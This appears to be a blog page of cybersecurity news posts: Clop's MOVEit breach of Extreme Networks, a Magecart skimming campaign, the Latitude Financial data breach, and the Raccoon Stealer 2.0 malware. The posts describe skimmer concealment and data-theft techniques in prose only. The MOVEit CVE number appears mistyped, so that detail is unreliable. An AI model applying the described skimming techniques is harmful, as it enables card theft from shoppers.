Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label online theft. Show all posts

Extreme Networks Hit by Clop MOVEit Attack

 

Extreme Networks has revealed that it has fallen victim to the rapidly evolving MOVEit cyber attack. As a consequence, customers who rely on the network hardware and services provided by Extreme Networks may face the potential threat of having their data compromised by the notorious Clop (aka Cl0p) cyber extortion group. 

A security flaw called CVE-2023-34262 has been discovered in MOVEit transfer, allowing attackers to exploit SQL injection vulnerabilities. The notorious cyber group known as Clop has been actively developing methods to exploit this vulnerability for a significant period. 

Clop has targeted multiple file transfer products, compromising them and leveraging them against their users. Zellis, a company specializing in HR and payroll software, has emerged as the most prominent target of Clop's recent wave of attacks. 

Following the detection of suspicious activity related to the CVE-2023-34262 exploit chain, LeMagIT, reached out to Extreme Networks on Tuesday, June 6th. They discovered an instance of the affected managed file transfer service, MOVEit Transfer, linked to Extreme Networks' domain. The observed behavior of this instance raised concerns about a potential security breach.

Philip Swain, the Chief Information Security Officer (CISO) of Extreme Networks, acknowledged that their instance of the Progress Software MOVEit Transfer tool had experienced a security breach. Swiftly responding to the incident, they activated their security protocols and successfully contained the affected areas. 

Swain stated that their investigation into the matter is still in progress. In the event that customer information is found to be compromised, Extreme Networks will directly notify the affected customers and provide them with a comprehensive disclosure of all relevant details. 

Additionally, Israel-based threat intelligence firm, Cybersixgill, reported recent findings by its research team regarding the dark web forums. They discovered several posts explicitly seeking data on victims based in the UK. One post even offered a substantial reward of up to $100,000. 

Notably, these requests specifically targeted customers of Zellis. Furthermore, the Cybersixgill revealed that the threat actor responsible for the posts also claimed that the acquired data would be utilized by a specialized team focused on leveraging data sourced from the UK.

Online Thieves Target Legitimate Ecommerce CCTSites to Steal Credit Cards

 

In a recent Magecart credit card theft campaign, legitimate websites are taken over and used as "makeshift" command and control (C2) servers to inject and conceal skimmers on selected eCommerce sites.

An online store breached by hackers to insert malicious scripts that steal customers' credit cards and personal information while they are checking out is known as a "Magecart attack." 

The United States, the United Kingdom, Australia, Brazil, Peru, and Estonian organisations have all been penetrated, according to Akamai researchers following this campaign.

A further indication of the stealthiness of these attacks, according to the cybersecurity firm, is the fact that many victims haven't been aware they've been compromised for more than a month. 

Exploiting legitimate sites 

The initial step taken by the attackers is to find trustworthy websites that are vulnerable and hack them to host their malicious code and function as C2 servers for their attacks. 

Threat actors avoid detection and blockades and are spared from having to build up their own infrastructure by disseminating credit card skimmers through reputable, legal websites. 

The next step taken by the attackers is to insert a short JavaScript snippet into the target e-commerce websites that retrieves the malicious code from the previously compromised websites.

"Although it is unclear how these sites are being breached, based on our recent research from similar, previous campaigns, the attackers will usually look for vulnerabilities in the targeted websites' digital commerce platform (such as Magento, WooCommerce, WordPress, Shopify, etc.) or in vulnerable third-party services used by the website," researchers explained in the report. 

To enhance the attack's stealthiness, the threat actors developed the skimmer's structure to mimic that of Google Tag Manager or Facebook Pixel, which are well-known third-party services that are unlikely to draw attention. Base64 encoding also hides the host's URL. 

Data theft details 

Akamai claims to have observed two different skimmer iterations being used in the specific campaign. 

A number of CSS selectors that target consumer PII and credit card information are included in the initial version, which is highly obscured. For each site that was targeted, a different set of CSS selectors was created specifically for that victim. 

The second skimmer variant's lack of security allowed indicators in the code to be exposed, which allowed Akamai to map the campaign's distribution and identify more victims.

The data is sent to the attacker's server via an HTTP request formed as an IMG tag inside the skimmer after the skimmers steal the customers' personal information. The data also has a layer of Base64 encoding to obscure the transmission and lessen the chance that the victim will notice the breach. 

By safeguarding website admin accounts effectively and updating their CMS and plugins, website owners may fend off Magecart invasions. By adopting electronic payment methods, virtual cards, or restricting how much can be charged to their credit cards, customers of online stores can reduce the danger of data exposure.

Latitude Financial Reveals Extent of Cyber Attack: 14 Million Customers Affected

 

Recently, Latitude Financial, a company listed on the Australian Securities Exchange (ASX), reported that it had suffered a cyber attack. The company stated that the attack was believed to have originated from a major vendor used by the company and that the attacker had obtained login credentials from an employee. The attacker then used these credentials to steal personal information that was held by two other service providers. 

Latitude Financial provides a range of financial services, including loans, credit cards, and insurance, in Australia, New Zealand, Canada, and Singapore. The company also offers interest-free installments for customers of retailers such as JB Hi-Fi, The Good Guys, and David Jones when they shop online. 

Following the attack, DXC Technology, a global technology services company, issued a statement on its website confirming that its global network and customer support networks were not compromised in the attack on Latitude Financial. 

Ten days after Latitude Financial revealed that it had suffered a cyber attack, the company discovered that the breach was much more severe than initially believed. Data from 14 million people had been accessed, rather than the 330,000 that was initially thought. 

The attacker had used the stolen employee credentials to access customer data stored by both service providers before the incident was patched. As of 27 March, Latitude Financial had identified that 7.9 million Australian and New Zealand driver license numbers were stolen, with approximately 3.2 million of them provided to the company in the last 10 years. Additionally, around 53,000 passport numbers were accessed, and fewer than 100 customers had a monthly financial statement stolen. 

The company further confirmed that 6.1 million records dating back to 2005 had been accessed, including customers' names, addresses, telephone numbers, and dates of birth. 

In response to the breach, Latitude Financial's Chief Security Officer, Ahmed Fahour, stated that the company was committed to working closely with affected customers and applicants to minimize risk and disruption, including compensating the cost of replacing ID documents. The company also urged its customers to be vigilant and report any suspicious behavior relating to their accounts and reminded them that the company would never contact them to request passwords.

Watch Out For This Raccoon Stealer 2.0 With New Capabilities


Raccoon Stealer also named Legion, Mohazo, and Racealer, a high-risk trojan-type application that attacks the system and steals personal credentials is back with a second upgraded version circulating on cybercrime forums, offering hackers elevated password-stealing functionality and advanced operational capacity. 

The trojan whose services are being offered by various hacker groups on hacker forums, when installed on one's system can lead to various cyber issues. 

The Raccoon Stealer operation was taken down in march 2022 when its operators reported that one of the lead developers of the forum was killed during Russia’s invasion of Ukraine. Also, the team promised its come back with a second upgraded version with more capabilities. 

“We expect a resurgence of Raccoon Stealer v2, as developers implemented a version tailored to the needs of cybercriminals (efficiency, performance, stealing capabilities, etc.) and scaled their backbone servers to handle large loads,” Sekoia told in the report. 

According to the malware developers, the upgraded Raccoon version was built from scratch using C/C++, featuring a new back-end, front-end, and code to steal credentials and other data. 

Raccoon Stealer 2.0 uses a fake Malwarebytes website to steal personal information including Basic system fingerprinting info, browser passwords, cookies, autofill data, saved credit cards, browser passwords, cookies, and autofill data, and saved credit cards. 

Other information that Raccoon Stealer steals is given below:

• Cryptocurrency wallets and web browser extensions including MetaMask, TronLink, BinanceChain, and Ronin
• Exodus, Atomic, JaxxLiberty, Binance, Coinomi, Electrum, Electrum-LTC, and ElectronCash
• Individual files located on all disks
• Screenshot capturing
• Installed applications list

The data can be misused in various ways, such as transferring users' funds in crypto-wallets and other accounts (e.g., PayPal, bank accounts, etc.). Victims could, therefore, lose their savings. Moreover, hijacked accounts (e.g., Facebook, emails, etc.) can be misused to borrow money. 

The subscription cost of the Stealer which has already attacked over 100,000 devices, is $200 per month. It has become one of the most named viruses on the underground forums in 2019.